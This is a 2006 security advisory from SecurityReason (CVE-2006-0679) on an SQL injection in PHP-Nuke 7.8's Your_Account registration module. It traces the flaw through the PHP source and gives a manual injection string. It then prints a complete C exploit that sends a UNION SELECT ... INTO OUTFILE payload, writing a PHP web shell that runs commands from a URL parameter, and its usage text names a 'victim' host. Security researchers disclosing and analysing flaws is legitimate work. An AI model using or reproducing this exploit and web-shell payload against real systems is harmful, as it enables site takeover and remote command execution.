-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SecurityAlert SA032
 
Author: sp3x
CVE : CVE-2006-0679
Date: 16. February 2006
 
Affected software :
===================
 
PHPNuke version : 7.8 with all security fixes/patches
 
Not Affected software :
=======================
 
PHPNuke version : 7.9 + patch 3.1
 
Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community or whatever you want to call it. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles, just similar to Slashdot and many others. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web server, PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase).
  Support for 25 languages, Yahoo like search engine, Comments option in Polls, lot of themes, Ephemerids manager, File Manager, Headlines, download manager, faq manager, advanced blocks systems, reviews system, newsletter, categorized articles, multilanguage content management, phpBB Forums included and a lot more.
 

Vulnerabilities :
*****************
 
Critical SQL injection   :
==========================
 
IN module called "Your_Account" there exists  SQL Injection bug, which can lead to stealing admin`s username and password md5 and also some sensitive data from database.
 

The problem exist in index.php so first let's see the source code of this file.
 
Original code from index.php :
- ---------------------------------
...
function confirmNewUser($username, $user_email, $user_password, $user_password2, $random_num, $gfx_check) {
 global $stop, $EditedMessage, $sitename, $module_name, $minpass;
 include("header.php");
 include("config.php");
 filter_text($username);
 $username = $EditedMessage;
 $user_viewemail = "0";
 userCheck($username, $user_email);
 $user_email = validate_mail($user_email);
....
- -----------------------------------
 
Here we can see that there is filter_text() used on $query variable and later we have userCheck($username, $user_email); ,
Ok lets see function filter_text(); .
Orginal code from mainfile.php :
- ----------------------------------
function filter_text($Message, $strip="") {
 global $EditedMessage;
 check_words($Message);
 $EditedMessage=check_html($EditedMessage, $strip);
 return $EditedMessage;
}
- -----------------------------------
Here we have another function check_words($Message); , lets check this also :
 
Orginal code from mainfile.php :
- --------------------------------
function check_html ($str, $strip="") {
 /* The core of this code has been lifted from phpslash */
 /* which is licenced under the GPL. */
 include("config.php");
 if ($strip == "nohtml")
     global $AllowableHTML; 
     if (!is_array($AllowableHTML)) $AllowableHTML =array('');
 $str = stripslashes($str);
 $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);
 // Delete all spaces from html tags .
 $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);
 // Delete all attribs from Anchor, except an href, double quoted.
 $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);
 // Delete all img tags
 $str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);
 // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
 $tmp = "";
 while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
  $i = strpos($str,$reg[0]);
  $l = strlen($reg[0]);
  if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));
  else $tag = strtolower($reg[1]);
  if ($a = $AllowableHTML[$tag])
  if ($reg[1][0] == "/") $tag = "</$tag>";
  elseif (($a == 1) || (empty($reg[2]))) $tag = "<$tag>";
  else {
   # Place here the double quote fix function.
   $attrb_list=delQuotes($reg[2]);
   // A VER
   $attrb_list = str_replace("&","&",$attrb_list);
   $tag = "<$tag" . $attrb_list . ">";
  } # Attribs in tag allowed
  else $tag = "";
  $tmp .= substr($str,0,$i) . $tag;
  $str = substr($str,$i+$l);
 }
 $str = $tmp . $str;
 return $str;
 exit;
 /* Squash PHP tags unconditionally */
 $str = str_replace("<?","",$str);
 return $str;
}
- ----------------------------------------
This function return $str variable but at the beginning of this function we can see
$str = stripslashes($str); .
So when we have in index.php :
filter_text($username);
this mean that on variable $username is used stripslashes();
Lower in index.php we can see :
userCheck($username, $user_email);
So another function userCheck(); that uses $username variable , lets see the code :
 
Orginal code from index.php :
- -----------------------------
....
function userCheck($username, $user_email) {
 global $stop, $user_prefix, $db;
 if ((!$user_email) || (empty($user_email)) || (!eregi("^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,6}$",$user_email))) $stop = "<center>"._ERRORINVEMAIL."</center><br>";
 if (strrpos($user_email,' ') > 0) $stop = "<center>"._ERROREMAILSPACES."</center>";
 if ((!$username) || (empty($username)) || (ereg("[^a-zA-Z0-9_-]",$username))) $stop = "<center>"._ERRORINVNICK."</center><br>";
 if (strlen($username) > 25) $stop = "<center>"._NICK2LONG."</center>";
 if (eregi("^((root)|(adm)|(linux)|(webmaster)|(admin)|(god)|(administrator)|(administrador)|(nobody)|(anonymous)|(anonimo)|(anónimo)|(operator)|(JackFromWales4u2))$",$username)) $stop = "<center>"._NAMERESERVED."</center>";
 if (strrpos($username,' ') > 0) $stop = "<center>"._NICKNOSPACES."</center>";
 if ($db->sql_numrows($db->sql_query("SELECT username FROM ".$user_prefix."_users WHERE username='$username'")) > 0) $stop = "<center>"._NICKTAKEN."</center><br>";
 if ($db->sql_numrows($db->sql_query("SELECT username FROM ".$user_prefix."_users_temp WHERE username='$username'")) > 0) $stop = "<center>"._NICKTAKEN."</center><br>";
.......
- --------------------------------
In this function we see two sql queries :
SELECT username FROM ".$user_prefix."_users WHERE username='$username'
SELECT username FROM ".$user_prefix."_users_temp WHERE username='$username'
 
At last here now we can say : "Critical SQL injection "
 
Time to exploit this issue :
Go to : http://[victim]/[phpnuke_dir]/modules.php?name=Your_Account&op=new_user
And fill in all Fields but in Nickname: field enter : ' or 1=1/*
The Result is : 
- --------------
ERROR: Nickname already taken
- --------------
So the SQl injection is working but we can't see the results ...
It doesn't metter we can all our results write to file .
 
To do this i wrote a little exploit .
 
Exploit :
- ---------
 
http://securityreason.com/achievement_exploitalert/7

/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80 // port of the web server

void begin(void);
void sqlinj(int sock, char *argv[]);

int main(int argc, char *argv[]){

int sock;
struct sockaddr_in addr;
struct hostent *hp=0;

if(argc!=4) {
begin();
}

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}

printf("\n\n[+] Creating socket [OK]\n");

if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}

printf("[+] Resolving %s [OK]\n", argv[1]);

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}


printf("[+] Connecting at %s [OK]\n", argv[1]);

sqlinj(sock, argv);

printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);

shutdown(sock, 2);
close(sock);

return(0);

}

void begin(void){


printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n" 
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n" 
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;

}

void sqlinj(int sock, char *argv[]){

FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}

setbuf(go,NULL);

size+=strlen(argv[3]);

fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET
[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");

}



 
How to fix :
============
 
Download the new version of the script or update.
 

Greets :
========
 
Special greets : cXIb8O3
 
And the rest : pkw , p_e_a, pi3, LordDav and alkeniu

Contact :
=========
 
sp3x[at]securityreason[dot]com
GPG: http://securityreason.com/key/sp3x.gpg
www.securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)

iD8DBQFD9FnqhaZ93YsJSwQRAhjjAJ4yhgq8xeJX0Nq4nuC9Id25SB8B8ACeMqtx
idqutIAdBkMn/4qeCps6k54=
=7sJt
-----END PGP SIGNATURE-----